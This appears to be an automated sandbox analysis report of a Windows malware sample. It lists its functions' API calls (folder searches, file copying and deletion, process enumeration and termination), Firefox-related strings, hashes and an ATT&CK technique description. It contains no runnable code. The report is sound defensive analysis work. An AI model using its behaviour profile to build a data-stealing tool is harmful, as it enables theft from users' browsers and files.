Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073D481
lstrlenA.KERNEL32(00000000), ref: 0073D698
lstrlenA.KERNEL32(00000000), ref: 0073D6AC
DeleteFileA.KERNEL32(00000000), ref: 0073D72B

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 556b31ef9ea28f1eeae1e05099358b3ae0acff026304526b83f7ae0ecd516971
Instruction ID: 8bbed56c3ae772983837476fac4307c7b7bfa7a9ac8893b577cbd93765c615a7
Opcode Fuzzy Hash: 556b31ef9ea28f1eeae1e05099358b3ae0acff026304526b83f7ae0ecd516971
Instruction Fuzzy Hash: 73910172950108EAEB05FBA0DC9AEEE737CEF54304F514168F51666092EF386A49CB62

Function 0073D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073D801
lstrlenA.KERNEL32(00000000), ref: 0073D99F
lstrlenA.KERNEL32(00000000), ref: 0073D9B3
DeleteFileA.KERNEL32(00000000), ref: 0073DA32

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 2ed0a9f43f38326d1a09bc395695dcb414812f381756d3aa308b80530aab91d4
Instruction ID: 1b4f3dc9189dec01af0657865f6445aa9cd949f0534e60259f62b6c848db7e41
Opcode Fuzzy Hash: 2ed0a9f43f38326d1a09bc395695dcb414812f381756d3aa308b80530aab91d4
Instruction Fuzzy Hash: 71812472954104EBEB05FBA0DC5ADEE737DEF54304F414528F407A6092EF386A09CB62

Function 0073F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A

Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00751580,00750D92), ref: 0073F54C
lstrlenA.KERNEL32(00000000), ref: 0073F56B

Strings

^userContextId=4294967295, xrefs: 0073F59C
moz-extension+++, xrefs: 0073F5AD

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 178837d3ac3983219a77f2f711eed9012078688166137871c8dd2606e06a60cc
Instruction ID: 3dfec5e78dca315b81ad8f33e66af7d6a8c014785225051ae328afc1dac58f69
Opcode Fuzzy Hash: 178837d3ac3983219a77f2f711eed9012078688166137871c8dd2606e06a60cc
Instruction Fuzzy Hash: 7A51E071D50108FAEB15FBA4DC9ADED737CAF54304F508528F81666191EF386A09CBA2

Function 007494D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007494EB

Part of subcall function 00748D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0074951E,00000000), ref: 00748D5B
Part of subcall function 00748D50: HeapAlloc.KERNEL32(00000000,?,?,0074951E,00000000), ref: 00748D62
Part of subcall function 00748D50: wsprintfW.USER32 ref: 00748D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 007495AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 007495C9
CloseHandle.KERNEL32(00000000), ref: 007495D6

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 32bb784b87551dfc12ad89ce6488fe3969b09d8930f4a72326b345d0f70cc568
Instruction ID: 33f72434bf25702d41cdf005c2037404110c4f828ede5e4769cbb083aacd11f2
Opcode Fuzzy Hash: 32bb784b87551dfc12ad89ce6488fe3969b09d8930f4a72326b345d0f70cc568
Instruction Fuzzy Hash: A9314F71E00208EFDB14DFD0CC49BEEB778FB44300F204559E60AAB184DB789A85DB52

Function 00748680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007505B7), ref: 007486CA
Process32First.KERNEL32(?,00000128), ref: 007486DE
Process32Next.KERNEL32(?,00000128), ref: 007486F3

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

CloseHandle.KERNEL32(?), ref: 00748761

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 061e53fbf4c39698ab0bda324f88bce4686dfee748bb8f5a28816b662e3d6b73
Instruction ID: 7a392a55d61a1f51e4fa55d999ce01d94882c56aed66a5c23636ae55f810e9b6
Opcode Fuzzy Hash: 061e53fbf4c39698ab0bda324f88bce4686dfee748bb8f5a28816b662e3d6b73
Instruction Fuzzy Hash: F9316D71941218EBDB25DF90CC55FEEB778EB44700F1041A9E50AA21A0DB386E45CFA2

Function 00744F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00744F7A
lstrcatA.KERNEL32(?,00751070), ref: 00744F97
lstrcatA.KERNEL32(?,00FCD940), ref: 00744FAB
lstrcatA.KERNEL32(?,00751074), ref: 00744FBD

Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943

Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: ceacf2f57a4f8925da754ebb4624d777604cde5b1c0c5d8cee5ef8e48711fb85
Instruction ID: ea38c41ea9eaebef57b1cd3941709da6343c9cd021d14b8fcbd344a92cd26292
Opcode Fuzzy Hash: ceacf2f57a4f8925da754ebb4624d777604cde5b1c0c5d8cee5ef8e48711fb85
Instruction Fuzzy Hash: 582198B7914208ABD754FBB0DC4AFED337CABD4301F404554B65D92181EEB8AAC89B93

Function 00747980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00750E00,00000000,?), ref: 007479B0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00750E00,00000000,?), ref: 007479B7
GetLocalTime.KERNEL32(?,?,?,?,?,00750E00,00000000,?), ref: 007479C4
wsprintfA.USER32 ref: 007479F3

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: c813a343f89b8765742dd021e69429561b312b3a4e951f15df7986a4a10f9198
Instruction ID: a76ec64370861e8c75fd41b769a078a56456670ccc8e41071564d93a72b8b2c3
Opcode Fuzzy Hash: c813a343f89b8765742dd021e69429561b312b3a4e951f15df7986a4a10f9198
Instruction Fuzzy Hash: 981127B2918118ABCB14DFC9DD45BBEB7F8FB8CB11F14425AF605A2280E3395940DBB1

Function 00736D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

`os, xrefs: 00736DD2, 00736E94, 00736DAE, 00736E5E, 00736EAF

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID:
String ID: `os
API String ID: 0-2633975260
Opcode ID: 115edcabb5af8ae97aec8708725c816f709b95cba0619726e99438678432c9aa
Instruction ID: 97fe0d3f48704cfef679c1ef5e9d129b4182cf33d2745f6ee7a76a544e0be0aa
Opcode Fuzzy Hash: 115edcabb5af8ae97aec8708725c816f709b95cba0619726e99438678432c9aa
Instruction Fuzzy Hash: 9B6119B5D00219EFEB14DF94E988BEEB7B0BB04304F108598E51967282D739AF94DF91

Function 00744BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00744BEA
lstrcatA.KERNEL32(?,00FD0770), ref: 00744C08

Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943

Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92

Part of subcall function 00744910: wsprintfA.USER32 ref: 007449B0
Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,007508D2), ref: 007449C5
Part of subcall function 00744910: wsprintfA.USER32 ref: 007449E2
Part of subcall function 00744910: PathMatchSpecA.SHLWAPI(?,?), ref: 00744A1E
Part of subcall function 00744910: lstrcatA.KERNEL32(?,00FCD870,?,000003E8), ref: 00744A4A
Part of subcall function 00744910: lstrcatA.KERNEL32(?,00750FF8), ref: 00744A5C
Part of subcall function 00744910: lstrcatA.KERNEL32(?,?), ref: 00744A70
Part of subcall function 00744910: lstrcatA.KERNEL32(?,00750FFC), ref: 00744A82
Part of subcall function 00744910: lstrcatA.KERNEL32(?,?), ref: 00744A96
Part of subcall function 00744910: CopyFileA.KERNEL32(?,?,00000001), ref: 00744AAC
Part of subcall function 00744910: DeleteFileA.KERNEL32(?), ref: 00744B31

Part of subcall function 00744910: wsprintfA.USER32 ref: 00744A07

Strings

Uat, xrefs: 00744C2F, 00744C64, 00744C9A, 00744CCF, 00744D05, 00744D3A, 00744D5F, 00744C32, 00744C67, 00744C9D, 00744CD2, 00744D08, 00744D3D

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: Uat
API String ID: 2104210347-3199785610
Opcode ID: 0febf3912478305636c093ad31b381ccb5fbc01bceb736b02156454ab0684770
Instruction ID: 9577e3a3cdb5435a6f1cccff07f28b861d4bd6d412b450f23255cf2890b8e1e8
Opcode Fuzzy Hash: 0febf3912478305636c093ad31b381ccb5fbc01bceb736b02156454ab0684770
Instruction Fuzzy Hash: 6F41B5B7504104ABD794FBA0EC46EEE333DA7C8700F40854CB54A96186EE796BCC9BD2

Function 00748B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86

Strings

cIs, xrefs: 00748B6C, 00748BE5, 00748BF0, 00748C04, 00748BD3, 00748BF3
cIs, xrefs: 00748BB1, 00748BE1, 00748BE4

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: cIs$cIs
API String ID: 62757014-1013043559
Opcode ID: 16973c926b6d81e34edd282ed1c16546182dd4c7c3cedb6ad0a8803f0c907a40
Instruction ID: 78e14bbaf73ce0e5edf59c794577ef2e966c5d8ffb7ff72b8bb4ec081d3c3359
Opcode Fuzzy Hash: 16973c926b6d81e34edd282ed1c16546182dd4c7c3cedb6ad0a8803f0c907a40
Instruction Fuzzy Hash: EB1186B2D04108EFDB05EFA8C8969EE77B9EF58300F14C059F51667251EF386945CBA2

Function 00745050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0074508A
lstrcatA.KERNEL32(?,00FD0090), ref: 007450A8

Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943

Strings

at, xrefs: 007450CF, 007450F4, 007450D2

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: at
API String ID: 2699682494-3485432671
Opcode ID: 1a80e5ee611bab14b1af46ec72c8a81bfa98dd2a99d60225e41def716a378be7
Instruction ID: 8f9950a4313379b52b21325dff564d5ea506615134761e0584377ff80a0ffc93
Opcode Fuzzy Hash: 1a80e5ee611bab14b1af46ec72c8a81bfa98dd2a99d60225e41def716a378be7
Instruction Fuzzy Hash: 7901DB77914208E7D754FB70DC46EEE333CAB94300F404144B65952181EF78AAC89BD3

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
